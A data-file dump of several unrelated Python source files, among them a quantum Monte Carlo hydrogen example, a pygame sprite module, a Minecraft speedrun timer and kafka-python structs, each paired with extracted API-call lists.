code (stringlengths 22–1.05M) | apis (listlengths 1–3.31k) | extract_api (stringlengths 75–3.25M)
---|---|---
import autograd.numpy as np
from pyCHAMP.wavefunction.wf_base import WF
from pyCHAMP.optimizer.minimize import Minimize
from pyCHAMP.sampler.metropolis import Metropolis
from pyCHAMP.sampler.hamiltonian import Hamiltonian
from pyCHAMP.solver.vmc import VMC
class Hydrogen(WF):
def __init__(self, nelec, ndim):
WF.__init__(self, nelec, ndim)
def values(self, parameters, pos):
""" Compute the value of the wave function.
Args:
parameters : parameters of the wave function
pos: positions of the electrons
Returns: values of psi
"""
beta = parameters[0]
if pos.ndim == 1:
pos = pos.reshape(1, -1)
r = np.sqrt(np.sum(pos**2, 1))
return 2*np.exp(-beta*r).reshape(-1, 1)
def nuclear_potential(self, pos):
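# Coulomb attraction between the electron and a proton fixed at the origin: V(r) = -1/r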
r = np.sqrt(np.sum(pos**2, 1))
rm1 = - 1. / r
return rm1.reshape(-1, 1)
def electronic_potential(self, pos):
return 0
if __name__ == "__main__":
wf = Hydrogen(nelec=1, ndim=3)
sampler = Metropolis(nwalkers=1000, nstep=1000, step_size=3,
nelec=1, ndim=3, domain={'min': -5, 'max': 5})
sampler = Hamiltonian(nwalkers=1000, nstep=1000,
step_size=3, nelec=1, ndim=3)
optimizer = Minimize(method='bfgs', maxiter=25, tol=1E-4)
# VMC solver
vmc = VMC(wf=wf, sampler=sampler, optimizer=optimizer)
# single point
opt_param = [1.]
pos, e, s = vmc.single_point(opt_param)
print('Energy : ', e)
print('Variance : ', s)
vmc.plot_density(pos)
# optimization
init_param = [0.5]
vmc.optimize(init_param)
vmc.plot_history()
| [
"autograd.numpy.sum",
"pyCHAMP.sampler.hamiltonian.Hamiltonian",
"autograd.numpy.exp",
"pyCHAMP.wavefunction.wf_base.WF.__init__",
"pyCHAMP.solver.vmc.VMC",
"pyCHAMP.optimizer.minimize.Minimize",
"pyCHAMP.sampler.metropolis.Metropolis"
]
| [((1055, 1157), 'pyCHAMP.sampler.metropolis.Metropolis', 'Metropolis', ([], {'nwalkers': '(1000)', 'nstep': '(1000)', 'step_size': '(3)', 'nelec': '(1)', 'ndim': '(3)', 'domain': "{'min': -5, 'max': 5}"}), "(nwalkers=1000, nstep=1000, step_size=3, nelec=1, ndim=3, domain=\n {'min': -5, 'max': 5})\n", (1065, 1157), False, 'from pyCHAMP.sampler.metropolis import Metropolis\n'), ((1192, 1260), 'pyCHAMP.sampler.hamiltonian.Hamiltonian', 'Hamiltonian', ([], {'nwalkers': '(1000)', 'nstep': '(1000)', 'step_size': '(3)', 'nelec': '(1)', 'ndim': '(3)'}), '(nwalkers=1000, nstep=1000, step_size=3, nelec=1, ndim=3)\n', (1203, 1260), False, 'from pyCHAMP.sampler.hamiltonian import Hamiltonian\n'), ((1303, 1350), 'pyCHAMP.optimizer.minimize.Minimize', 'Minimize', ([], {'method': '"""bfgs"""', 'maxiter': '(25)', 'tol': '(0.0001)'}), "(method='bfgs', maxiter=25, tol=0.0001)\n", (1311, 1350), False, 'from pyCHAMP.optimizer.minimize import Minimize\n'), ((1377, 1425), 'pyCHAMP.solver.vmc.VMC', 'VMC', ([], {'wf': 'wf', 'sampler': 'sampler', 'optimizer': 'optimizer'}), '(wf=wf, sampler=sampler, optimizer=optimizer)\n', (1380, 1425), False, 'from pyCHAMP.solver.vmc import VMC\n'), ((326, 356), 'pyCHAMP.wavefunction.wf_base.WF.__init__', 'WF.__init__', (['self', 'nelec', 'ndim'], {}), '(self, nelec, ndim)\n', (337, 356), False, 'from pyCHAMP.wavefunction.wf_base import WF\n'), ((715, 734), 'autograd.numpy.sum', 'np.sum', (['(pos ** 2)', '(1)'], {}), '(pos ** 2, 1)\n', (721, 734), True, 'import autograd.numpy as np\n'), ((841, 860), 'autograd.numpy.sum', 'np.sum', (['(pos ** 2)', '(1)'], {}), '(pos ** 2, 1)\n', (847, 860), True, 'import autograd.numpy as np\n'), ((751, 768), 'autograd.numpy.exp', 'np.exp', (['(-beta * r)'], {}), '(-beta * r)\n', (757, 768), True, 'import autograd.numpy as np\n')] |
from braintree.configuration import Configuration
from braintree.resource import Resource
class AccountUpdaterDailyReport(Resource):
def __init__(self, gateway, attributes):
Resource.__init__(self, gateway, attributes)
if "report_url" in attributes:
self.report_url = attributes.pop("report_url")
if "report_date" in attributes:
self.report_date = attributes.pop("report_date")
def __repr__(self):
detail_list = ["report_url", "report_date"]
return super(AccountUpdaterDailyReport, self).__repr__(detail_list)
| [
"braintree.resource.Resource.__init__"
]
| [((188, 232), 'braintree.resource.Resource.__init__', 'Resource.__init__', (['self', 'gateway', 'attributes'], {}), '(self, gateway, attributes)\n', (205, 232), False, 'from braintree.resource import Resource\n')] |
import pygame
import pygame.gfxdraw
from constants import Constants
class Balls(object):
def __init__(self, all_sprites, all_balls):
self.all_sprites = all_sprites
self.all_balls = all_balls
def spawn_ball(self, pos, vel, team):
# Todo: Figure out how to spawn multiple balls with some sort of delay
ball = Ball(pos, vel, team)
self.all_sprites.add(ball)
self.all_balls.add(ball)
def ball_test(self):
print("This is a Ball Test!")
print(self)
def update(self):
print(self.__dict__)
print(type(self))
class Ball(pygame.sprite.Sprite):
def __init__(self, pos, vel, team):
super().__init__()
self.color = team
self.file = Constants.BALL_TEAMS[self.color]
self.rad = int(Constants.BALL_SIZE/2)
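# Render the ball: a transparent square surface with a filled circle in the team's colour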
self.image = pygame.Surface([Constants.BALL_SIZE, Constants.BALL_SIZE], pygame.SRCALPHA)
pygame.draw.circle(self.image, self.file, (self.rad, self.rad), self.rad)
self.x_pos = pos[0]
self.y_pos = pos[1]
self.rect = self.image.get_rect(center=(self.x_pos, self.y_pos))
self.dx = vel[0]
self.dy = vel[1]
def update(self):
self.check_boundary()
self.x_pos += self.dx
self.y_pos += self.dy
self.rect.center = [self.x_pos, self.y_pos]
# self.rect.center = pygame.mouse.get_pos() # has sprite follow the mouse
def check_boundary(self):
if not Constants.PLAYER_WIDTH <= self.x_pos <= (Constants.PLAYER_WIDTH+Constants.BOARD_WIDTH):
self.dx = -1*self.dx
if not 0 <= self.y_pos <= Constants.SCREEN_HEIGHT:
self.dy = -1*self.dy
| [
"pygame.draw.circle",
"pygame.Surface"
]
| [((851, 926), 'pygame.Surface', 'pygame.Surface', (['[Constants.BALL_SIZE, Constants.BALL_SIZE]', 'pygame.SRCALPHA'], {}), '([Constants.BALL_SIZE, Constants.BALL_SIZE], pygame.SRCALPHA)\n', (865, 926), False, 'import pygame\n'), ((935, 1008), 'pygame.draw.circle', 'pygame.draw.circle', (['self.image', 'self.file', '(self.rad, self.rad)', 'self.rad'], {}), '(self.image, self.file, (self.rad, self.rad), self.rad)\n', (953, 1008), False, 'import pygame\n')] |
from unittest import TestCase
from options.pricing.binomial_trees import BinomialTreePricer
from options.option import OptionType, Option
class BinomialTreeTestCase(TestCase):
def test_basic(self):
"""European option, spot price 50, strike price 52, risk free interest rate 5%
expiry 2 years, volatility 30%
"""
pricer = BinomialTreePricer(steps=100)
option = Option(OptionType.PUT, 50, 52, 0.05, 2, 0.3)
result = pricer.price_option(option)
self.assertEqual(6.7781, result)
| [
"options.option.Option",
"options.pricing.binomial_trees.BinomialTreePricer"
]
| [((362, 391), 'options.pricing.binomial_trees.BinomialTreePricer', 'BinomialTreePricer', ([], {'steps': '(100)'}), '(steps=100)\n', (380, 391), False, 'from options.pricing.binomial_trees import BinomialTreePricer\n'), ((409, 453), 'options.option.Option', 'Option', (['OptionType.PUT', '(50)', '(52)', '(0.05)', '(2)', '(0.3)'], {}), '(OptionType.PUT, 50, 52, 0.05, 2, 0.3)\n', (415, 453), False, 'from options.option import OptionType, Option\n')] |
import atexit
import os
import sys
import platform
import json
import glob
import datetime
import time
import threading
import tkinter as tk
from pynput import mouse
from pathlib import Path
from playsound import playsound
from enum import Enum
import copy
#"THE BEER-WARE LICENSE" (Revision 42):
#bleach86 wrote this file. As long as you retain this notice you can do whatever you want with this stuff.
#If we meet some day, and you think this stuff is worth it, you can buy me a beer in return
input_fil = Path("/Users/sharpieman20/MCtimer/MCtimer") / "input.txt"
# continuously read from input file every 10ms
# when you get a "reset timer" message, reset the timer
#
# class Category:
# def __init__():
# self.actions = []
# self.attempts = []
# # convert actions to attempts
# def read():
# def write():
# class Actions(Enum):
# CREATE_WORLD = 0
# START = 1
# class Attempt:
stage = 0
ind = 0
time_count = 0
rsg = [
("World Created", True),
([
"Savannah",
"Desert",
"Plains",
"Other"
], False),
([
"0-15",
"15-30",
"30-45",
"45-60",
"60-75",
"75+"
], False),
([
"Iron",
"Logs",
"Feathers",
"Wool",
"Gravel"
], True),
("Enter Nether", True),
("Find Fortress", True),
("Find Spawner", True),
("Exit Spawner", True),
("Exit Nether", True),
("Tower Build Start", True),
("Tower Build Finished", True),
("Tower Leave", True),
("Enter Stronghold", True),
("Enter End", True),
("Finish", True)
]
cur_stages = {}
json_file = 'mct_config.json'
with open(json_file) as json_file:
data2 = json.load(json_file)
if data2['borderless'] == 'true':
data2['borderless'] = True
else:
data2['borderless'] = False
running_path = Path.cwd()
NUM_CHARS = 11
system_type = platform.system()
if system_type == 'Linux':
directory = os.path.expanduser(data2['linux_saves'])
elif system_type == 'Darwin':
directory = os.path.expanduser(data2['mac_saves'])
elif system_type == 'Windows':
directory = os.path.expanduser(data2['windows_saves'])
amount2 = 0
last_amount = 0
window = tk.Tk()
# bg = BindGlobal(widget=window)
window.text = tk.StringVar()
window.text2 = tk.StringVar()
window.text3 = tk.StringVar()
window.text4 = tk.StringVar()
window.geometry("{}x{}".format(data2["width"], data2["height"]))
window.configure(bg='black')
rt = time.time()
old_version = False
did_change = False
count = 0
ig = 0
base = 0
program_time = 0
metronome_armed = False
metronome_running = False
metronome_active = False
metronome_beats = int(data2['metronome_beats'])
listener = None
metronome_time = 0
base_update = int(data2['base_update'])
rta_update = int(data2['rta_update']) * base_update
metronome_bpm = int(data2['metronome_bpm'])
metronome_interval = 0
if data2['auto_start'] == 'true':
click1 = 1
click2 = 1
else:
click1 = 0
click2 = 0
cur_fil = None
world_base_time = 0
def get_time():
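# Read Minecraft's play-time stat from disk and return it formatted as H:MM:SS.mmm (in-game time)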
global last_amount
global old_version
global amount2
global ig
global did_change
# print("-------------------------")
if data2['1.7+'] == 'false':
try:
global cur_fil
global world_base_time
mc_dir = Path(directory).parent
stats_dir = mc_dir / "stats"
os.chdir(stats_dir)
json_file = glob.glob('*.dat')
stats_file = json_file[0]
amount = 0
with open(stats_file) as timer_file:
# print(timer_file)
data = json.load(timer_file)
for item in data["stats-change"]:
if "1100" in item:
amount = item["1100"]
# print(amount)
latest = max([os.path.join(directory,d) for d in os.listdir(directory)], key=os.path.getmtime)
# print(latest)
if latest != cur_fil:
cur_fil = latest
world_base_time = amount
# print("world base time now {}".format(world_base_time))
# print(amount)
amount2 = float(amount - world_base_time) / 20
# print(amount2)
run_time = str(datetime.timedelta(seconds=amount2, milliseconds=0.5))
# print(run_time)
if last_amount == amount:
ig = 0
return run_time[:-3]
else:
did_change = True
# print(latest + "\nTime: " + run_time)
last_amount = amount
ig = 0
return run_time[:-3]
except:
ig = 1
return '0:00:00.000'
else:
try:
latest = max([os.path.join(directory,d) for d in os.listdir(directory)], key=os.path.getmtime)
if system_type == "Linux" or system_type == "Darwin":
os.chdir(latest + '/stats/')
else:
os.chdir(latest + '\\stats\\')
json_file = glob.glob('*.json')
timer = json_file[0]
with open(timer) as json_file:
data = json.load(json_file)
try:
amount = data['stats']['minecraft:custom']['minecraft:play_one_minute']
except:
amount = data['stat.playOneMinute']
old_version = True
json_file.close()
amount2 = float(amount) / 20
run_time = str(datetime.timedelta(seconds=amount2, milliseconds=0.5))
if last_amount == amount:
ig = 0
return run_time[:-3]
else:
did_change = True
print(latest + "\nTime: " + run_time)
last_amount = amount
ig = 0
return run_time[:-3]
except:
ig = 1
return '0:00:00.000'
def window2():
font_name = data2['font_name']
rta_font_size = data2['rta_font_size']
igt_font_size = data2['igt_font_size']
font_modifiers = data2['font_modifiers']
rta_font = (font_name, rta_font_size, font_modifiers)
igt_font = (font_name, igt_font_size, font_modifiers)
greeting = tk.Label(fg=data2['rta_color'], bg=data2['bg_color'], font=rta_font, textvariable=window.text)
greeting.pack()
if data2['show_igt'] == 'true':
greeting2 = tk.Label(fg=data2['igt_color'], bg=data2['bg_color'], font=igt_font, textvariable=window.text2)
greeting2.pack()
if data2['use_counter'] == 'true':
greeting3 = tk.Label(fg=data2['counter_color'], bg=data2['bg_color'], font=rta_font, textvariable=window.text3)
greeting3.pack()
# bg.gbind(data2['increment'], on_increment_counter)
# greeting.after(0, update_count)
if data2['use_splits'] == 'true':
split_font_size = data2['split_font_size']
split_font = (font_name, split_font_size, font_modifiers)
greeting4 = tk.Label(fg=data2['split_color'], bg=data2['bg_color'], font=split_font, textvariable=window.text4)
greeting4.pack()
# bg.gbind(data2['cycle'], cycle)
# bg.gbind(data2['split'], split)
# bg.gbind(data2['skip'], skip)
reset_split()
# greeting.after(0, update_count)
# bg.gbind(data2['pause'], on_press)
# bg.gbind(data2['reset_start'], on_press2)
# if data2['enable_metronome'] == 'true':
# bg.gbind(data2['arm_metronome'], arm_metronome)
# bg.gbind(data2['start_metronome'], start_metronome)
# bg.gbind(data2['exit'], clicked3)
# bg.bind(data2['start_metronome'], start_metronome)
''' this works for the window detecting right click '''
# window.bind(data2['start_metronome'], start_metronome)
#window.bind("<Button-1>", clicked)
#window.bind("<Button-3>", clicked2)
greeting.after(0, tick_time)
greeting.after(0, update_time2)
window.title("MCtimer")
window.attributes('-topmost', True)
window.overrideredirect(data2['borderless'])
window.geometry(data2['window_pos'])
window.mainloop()
def update_time():
global rt
global program_time
# do_metronome_action()
if click1 == 1:
window.text.set(real_time())
elif click1 == 0:
# rt = time.time()
diff = amount2 - base
rtc = str(datetime.timedelta(seconds=diff))
diff_txt = rtc[:-3]
# print(diff_txt)
window.text.set(diff_txt)
# print(base)
if click2 == 0:
rt = time.time()
window.text.set("0:00:00.000")
# window.after(int(data2['rta_update'])/10, update_time)
def tick_time():
global time_count
global metronome_armed
time_count += 1
update_time()
if metronome_armed or time_count % 20 == 0:
check_input()
window.after(rta_update, tick_time)
def check_input():
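# Poll the shared input file for external commands (start/arm metronome, pause, start timer) and clear it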
txt = input_fil.read_text()
input_fil.write_text("")
global metronome_armed
# print(txt)
if "start_metronome" in txt:
print(data2['enable_metronome'])
if data2['enable_metronome'] == 'true':
start_metronome(None)
if "arm_metronome" in txt:
metronome_armed = True
if "pause_timer" in txt:
left_click()
if "start_timer" in txt:
right_click()
def update_time2():
window.text2.set(get_time())
window.after(1000, update_time2)
def update_count():
count_str = str(count)
text_str = ""
for i in range(0, int(NUM_CHARS/2)):
text_str += " "
text_str += count_str
for i in range(0, int(NUM_CHARS/2)):
text_str += " "
window.text3.set(text_str)
window.after(rta_update, update_count)
# def update_split()
def on_press(event):
left_click()
def on_press2(event):
right_click()
def update_split():
global stage
text_str = cur_stages[stage][0]
if type(text_str) == type([]):
text_str = text_str[ind]
window.text4.set(text_str)
def reset_split():
global ind, stage, cur_stages
ind = 0
stage = 0
cur_stages = copy.deepcopy(rsg)
update_split()
def cycle(event):
global ind, stage
ind += 1
item = cur_stages[stage]
if type(item[0]) == type([]):
if ind == len(item[0]):
ind = 0
else:
ind = 0
update_split()
def split(event):
global stage, ind
item = cur_stages[stage]
if item[1]:
if type(item[0]) == type([]):
item[0].remove(item[0][ind])
if len(item[0]) == 0:
stage += 1
ind = 0
update_split()
return
stage += 1
ind = 0
update_split()
def skip(event):
global stage
stage += 1
update_split()
def on_increment_counter(event):
increment_counter()
def clicked3(event):
sys.exit(1)
def clicked2(event):
right_click()
def clicked(event):
left_click()
def write_to_log(text):
pass
# log_dir = Path("/Users/sharpieman20/MCtimer/MCtimer/logs")
# log_fil = log_dir / data2["current_section"]
# log_fil.touch()
# log_fil = log_fil.open("a")
# log_fil.write(str(text)+"\n")
def left_click():
global click1
if click1 == 1:
click1 = 0
elif click1 == 0:
click1 = 0
# global base
# write_to_log(str(amount2-base))
# base = amount2
def right_click():
global click1
global click2
global count
global did_change
count = 0
did_change = True
if click2 == 1:
click1 = 0
click2 = 0
elif click2 == 0:
click2 = 1
click1 = 1
# print(float(amount2))
# print("hehe")
global base
write_to_log("reset {}".format(str(amount2-base)))
base = amount2
def increment_counter():
global count
count += 1
''' METRONOME CODE '''
''' Metronome mouse listener '''
def exit_handler():
global listener
mouse.Listener.stop(listener)
window.quit()
atexit.register(exit_handler)
def listen_for_right_click():
def on_click(x, y, button, pressed):
# print(button)
if pressed:
if pressed and button == mouse.Button.right:
start_metronome(None)
return False
# mouse.Listener.stop(listener)
# print("Right Click Detected (pressed)")
with mouse.Listener(on_click=on_click) as listener:
# listener.start()
listener.join()
''' Sound playing code '''
def play_file_named(str_name):
playsound((running_path / str_name).as_posix(), block = True)
def play_up_beep():
play_file_named("MetronomeHit.mp3")
def play_normal_beep():
play_file_named("MetronomeBase.mp3")
def play_metronome_preset():
time.sleep(0.06)
play_file_named("MetronomePreset.mp3")
''' Metronome functions '''
def arm_metronome(event):
global metronome_armed
global metronome_running
if metronome_armed or metronome_running:
return
metronome_armed = True
# x = threading.Thread(target=listen_for_right_click, daemon=True)
# x.start()
listen_for_right_click()
print("armed and ready")
def start_metronome(event):
run_metronome()
# print(metronome_running)
# arm_metronome = False
def run_metronome():
global metronome_time
global metronome_interval
global metronome_running
if data2['has_metronome_preset'] == 'true':
play_metronome_preset()
metronome_running = False
return
metronome_time = 0
base_time = round(time.time()*1000)
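# milliseconds per metronome beat (~60000 / bpm, truncated to a 10 ms step)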
metronome_interval = int(100 * 60 / metronome_bpm)*10
time.sleep(float(data2['beat_offset'])*metronome_interval/1000.0)
# print(metronome_interval)
while metronome_running:
start_time = round(time.time()*1000) - base_time
do_metronome_action()
end_time = round(time.time()*1000) - base_time
elapsed = end_time - start_time
time.sleep((metronome_interval - elapsed)/1000.0)
# print("{} {} {}".format(start_time, end_time, ))
metronome_time += metronome_interval
def do_metronome_action():
global metronome_running
global metronome_interval
if not metronome_running:
return
# print(metronome_interval)
# metronome_time = program_time - metronome_start_time
if metronome_time >= metronome_interval * metronome_beats:
metronome_running = False
return
# print(metronome_time)
# print(metronome_interval)
# print(time.time()*1000)
if metronome_time % metronome_interval == 0:
if (metronome_time % (metronome_interval*4)) == metronome_interval*3:
# print("up beep")
play_up_beep()
# pass
else:
# print("normal beep")
play_normal_beep()
# pass
# print(time.time()*1000)
# print()
def real_time():
global rt
global click1
global click2
global amount2
global old_version
global stage
global ig
global did_change
if data2['auto_adjust'] == 'true':
# print(did_change)
# print(base)
if did_change:
rt = float(time.time()) - float(amount2)
if data2['allow_offset'] == 'true':
rt += base
did_change = False
if data2['auto_start'] == 'true':
if ig == 1:
rt = time.time()
click1 = 1
click2 = 1
stage = 0
reset_split()
return '0:00:00.000'
elif click1 == 1:
if old_version == True and stage == 0:
ig = 0
rt = float(time.time()) - float(amount2)
rtc = str(datetime.timedelta(seconds=rt))
stage = 1
print("stop")
return rtc[:-3]
else:
ig = 0
rt2 = time.time()
real_time = rt2 - rt
rtc = str(datetime.timedelta(seconds=real_time))
# rt = float(amount2) - float(base)
# rtc = str(datetime.timedelta(seconds=rt))
return rtc[:-3]
else:
if click1 == 1:
rt2 = time.time()
real_time = rt2 - rt
rtc = str(datetime.timedelta(seconds=real_time))
return rtc[:-3]
def main():
window2()
main() | [
"time.sleep",
"tkinter.Label",
"sys.exit",
"copy.deepcopy",
"datetime.timedelta",
"os.listdir",
"pathlib.Path",
"tkinter.StringVar",
"platform.system",
"atexit.register",
"glob.glob",
"os.path.expanduser",
"pathlib.Path.cwd",
"pynput.mouse.Listener.stop",
"time.time",
"pynput.mouse.Listener",
"os.path.join",
"os.chdir",
"tkinter.Tk",
"json.load"
]
| [((1890, 1900), 'pathlib.Path.cwd', 'Path.cwd', ([], {}), '()\n', (1898, 1900), False, 'from pathlib import Path\n'), ((1930, 1947), 'platform.system', 'platform.system', ([], {}), '()\n', (1945, 1947), False, 'import platform\n'), ((2244, 2251), 'tkinter.Tk', 'tk.Tk', ([], {}), '()\n', (2249, 2251), True, 'import tkinter as tk\n'), ((2299, 2313), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2311, 2313), True, 'import tkinter as tk\n'), ((2329, 2343), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2341, 2343), True, 'import tkinter as tk\n'), ((2359, 2373), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2371, 2373), True, 'import tkinter as tk\n'), ((2389, 2403), 'tkinter.StringVar', 'tk.StringVar', ([], {}), '()\n', (2401, 2403), True, 'import tkinter as tk\n'), ((2503, 2514), 'time.time', 'time.time', ([], {}), '()\n', (2512, 2514), False, 'import time\n'), ((12135, 12164), 'atexit.register', 'atexit.register', (['exit_handler'], {}), '(exit_handler)\n', (12150, 12164), False, 'import atexit\n'), ((515, 558), 'pathlib.Path', 'Path', (['"""/Users/sharpieman20/MCtimer/MCtimer"""'], {}), "('/Users/sharpieman20/MCtimer/MCtimer')\n", (519, 558), False, 'from pathlib import Path\n'), ((1751, 1771), 'json.load', 'json.load', (['json_file'], {}), '(json_file)\n', (1760, 1771), False, 'import json\n'), ((1991, 2031), 'os.path.expanduser', 'os.path.expanduser', (["data2['linux_saves']"], {}), "(data2['linux_saves'])\n", (2009, 2031), False, 'import os\n'), ((6402, 6500), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['rta_color']", 'bg': "data2['bg_color']", 'font': 'rta_font', 'textvariable': 'window.text'}), "(fg=data2['rta_color'], bg=data2['bg_color'], font=rta_font,\n textvariable=window.text)\n", (6410, 6500), True, 'import tkinter as tk\n'), ((10249, 10267), 'copy.deepcopy', 'copy.deepcopy', (['rsg'], {}), '(rsg)\n', (10262, 10267), False, 'import copy\n'), ((10994, 11005), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (11002, 11005), False, 'import sys\n'), ((12081, 12110), 'pynput.mouse.Listener.stop', 'mouse.Listener.stop', (['listener'], {}), '(listener)\n', (12100, 12110), False, 'from pynput import mouse\n'), ((12913, 12929), 'time.sleep', 'time.sleep', (['(0.06)'], {}), '(0.06)\n', (12923, 12929), False, 'import time\n'), ((2078, 2116), 'os.path.expanduser', 'os.path.expanduser', (["data2['mac_saves']"], {}), "(data2['mac_saves'])\n", (2096, 2116), False, 'import os\n'), ((6573, 6672), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['igt_color']", 'bg': "data2['bg_color']", 'font': 'igt_font', 'textvariable': 'window.text2'}), "(fg=data2['igt_color'], bg=data2['bg_color'], font=igt_font,\n textvariable=window.text2)\n", (6581, 6672), True, 'import tkinter as tk\n'), ((6754, 6857), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['counter_color']", 'bg': "data2['bg_color']", 'font': 'rta_font', 'textvariable': 'window.text3'}), "(fg=data2['counter_color'], bg=data2['bg_color'], font=rta_font,\n textvariable=window.text3)\n", (6762, 6857), True, 'import tkinter as tk\n'), ((7157, 7260), 'tkinter.Label', 'tk.Label', ([], {'fg': "data2['split_color']", 'bg': "data2['bg_color']", 'font': 'split_font', 'textvariable': 'window.text4'}), "(fg=data2['split_color'], bg=data2['bg_color'], font=split_font,\n textvariable=window.text4)\n", (7165, 7260), True, 'import tkinter as tk\n'), ((8709, 8720), 'time.time', 'time.time', ([], {}), '()\n', (8718, 8720), False, 'import time\n'), ((12528, 12561), 'pynput.mouse.Listener', 'mouse.Listener', ([], {'on_click': 
'on_click'}), '(on_click=on_click)\n', (12542, 12561), False, 'from pynput import mouse\n'), ((14127, 14178), 'time.sleep', 'time.sleep', (['((metronome_interval - elapsed) / 1000.0)'], {}), '((metronome_interval - elapsed) / 1000.0)\n', (14137, 14178), False, 'import time\n'), ((2164, 2206), 'os.path.expanduser', 'os.path.expanduser', (["data2['windows_saves']"], {}), "(data2['windows_saves'])\n", (2182, 2206), False, 'import os\n'), ((3419, 3438), 'os.chdir', 'os.chdir', (['stats_dir'], {}), '(stats_dir)\n', (3427, 3438), False, 'import os\n'), ((3464, 3482), 'glob.glob', 'glob.glob', (['"""*.dat"""'], {}), "('*.dat')\n", (3473, 3482), False, 'import glob\n'), ((5125, 5144), 'glob.glob', 'glob.glob', (['"""*.json"""'], {}), "('*.json')\n", (5134, 5144), False, 'import glob\n'), ((13724, 13735), 'time.time', 'time.time', ([], {}), '()\n', (13733, 13735), False, 'import time\n'), ((15587, 15598), 'time.time', 'time.time', ([], {}), '()\n', (15596, 15598), False, 'import time\n'), ((16419, 16430), 'time.time', 'time.time', ([], {}), '()\n', (16428, 16430), False, 'import time\n'), ((3341, 3356), 'pathlib.Path', 'Path', (['directory'], {}), '(directory)\n', (3345, 3356), False, 'from pathlib import Path\n'), ((3655, 3676), 'json.load', 'json.load', (['timer_file'], {}), '(timer_file)\n', (3664, 3676), False, 'import json\n'), ((4307, 4360), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'amount2', 'milliseconds': '(0.5)'}), '(seconds=amount2, milliseconds=0.5)\n', (4325, 4360), False, 'import datetime\n'), ((4990, 5018), 'os.chdir', 'os.chdir', (["(latest + '/stats/')"], {}), "(latest + '/stats/')\n", (4998, 5018), False, 'import os\n'), ((5070, 5100), 'os.chdir', 'os.chdir', (["(latest + '\\\\stats\\\\')"], {}), "(latest + '\\\\stats\\\\')\n", (5078, 5100), False, 'import os\n'), ((5257, 5277), 'json.load', 'json.load', (['json_file'], {}), '(json_file)\n', (5266, 5277), False, 'import json\n'), ((8532, 8564), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'diff'}), '(seconds=diff)\n', (8550, 8564), False, 'import datetime\n'), ((16486, 16523), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'real_time'}), '(seconds=real_time)\n', (16504, 16523), False, 'import datetime\n'), ((3868, 3894), 'os.path.join', 'os.path.join', (['directory', 'd'], {}), '(directory, d)\n', (3880, 3894), False, 'import os\n'), ((4814, 4840), 'os.path.join', 'os.path.join', (['directory', 'd'], {}), '(directory, d)\n', (4826, 4840), False, 'import os\n'), ((5620, 5673), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'amount2', 'milliseconds': '(0.5)'}), '(seconds=amount2, milliseconds=0.5)\n', (5638, 5673), False, 'import datetime\n'), ((13964, 13975), 'time.time', 'time.time', ([], {}), '()\n', (13973, 13975), False, 'import time\n'), ((14049, 14060), 'time.time', 'time.time', ([], {}), '()\n', (14058, 14060), False, 'import time\n'), ((15363, 15374), 'time.time', 'time.time', ([], {}), '()\n', (15372, 15374), False, 'import time\n'), ((16092, 16103), 'time.time', 'time.time', ([], {}), '()\n', (16101, 16103), False, 'import time\n'), ((3903, 3924), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (3913, 3924), False, 'import os\n'), ((4849, 4870), 'os.listdir', 'os.listdir', (['directory'], {}), '(directory)\n', (4859, 4870), False, 'import os\n'), ((15909, 15939), 'datetime.timedelta', 'datetime.timedelta', ([], {'seconds': 'rt'}), '(seconds=rt)\n', (15927, 15939), False, 'import datetime\n'), ((16167, 16204), 'datetime.timedelta', 
'datetime.timedelta', ([], {'seconds': 'real_time'}), '(seconds=real_time)\n', (16185, 16204), False, 'import datetime\n'), ((15853, 15864), 'time.time', 'time.time', ([], {}), '()\n', (15862, 15864), False, 'import time\n')] |
""" Other useful structs """
from __future__ import absolute_import
from collections import namedtuple
"""A topic and partition tuple
Keyword Arguments:
topic (str): A topic name
partition (int): A partition id
"""
TopicPartition = namedtuple("TopicPartition",
["topic", "partition"])
"""A Kafka broker metadata used by admin tools.
Keyword Arguments:
nodeID (int): The Kafka broker id.
host (str): The Kafka broker hostname.
port (int): The Kafka broker port.
rack (str): The rack of the broker, which is used to in rack aware
partition assignment for fault tolerance.
Examples: `RACK1`, `us-east-1d`. Default: None
"""
BrokerMetadata = namedtuple("BrokerMetadata",
["nodeId", "host", "port", "rack"])
"""A topic partition metadata describing the state in the MetadataResponse.
Keyword Arguments:
topic (str): The topic name of the partition this metadata relates to.
partition (int): The id of the partition this metadata relates to.
leader (int): The id of the broker that is the leader for the partition.
replicas (List[int]): The ids of all brokers that contain replicas of the
partition.
isr (List[int]): The ids of all brokers that contain in-sync replicas of
the partition.
error (KafkaError): A KafkaError object associated with the request for
this partition metadata.
"""
PartitionMetadata = namedtuple("PartitionMetadata",
["topic", "partition", "leader", "replicas", "isr", "error"])
"""The Kafka offset commit API
The Kafka offset commit API allows users to provide additional metadata
(in the form of a string) when an offset is committed. This can be useful
(for example) to store information about which node made the commit,
what time the commit was made, etc.
Keyword Arguments:
offset (int): The offset to be committed
metadata (str): Non-null metadata
"""
OffsetAndMetadata = namedtuple("OffsetAndMetadata",
# TODO add leaderEpoch: OffsetAndMetadata(offset, leaderEpoch, metadata)
["offset", "metadata"])
"""An offset and timestamp tuple
Keyword Arguments:
offset (int): An offset
timestamp (int): The timestamp associated to the offset
"""
OffsetAndTimestamp = namedtuple("OffsetAndTimestamp",
["offset", "timestamp"])
MemberInformation = namedtuple("MemberInformation",
["member_id", "client_id", "client_host", "member_metadata", "member_assignment"])
GroupInformation = namedtuple("GroupInformation",
["error_code", "group", "state", "protocol_type", "protocol", "members", "authorized_operations"])
"""Define retry policy for async producer
Keyword Arguments:
limit (int): Number of retries; limit >= 0, 0 means no retries.
backoff_ms (int): Milliseconds to back off between retries.
retry_on_timeouts (bool): Whether to retry requests that timed out.
"""
RetryOptions = namedtuple("RetryOptions",
["limit", "backoff_ms", "retry_on_timeouts"])
| [
"collections.namedtuple"
]
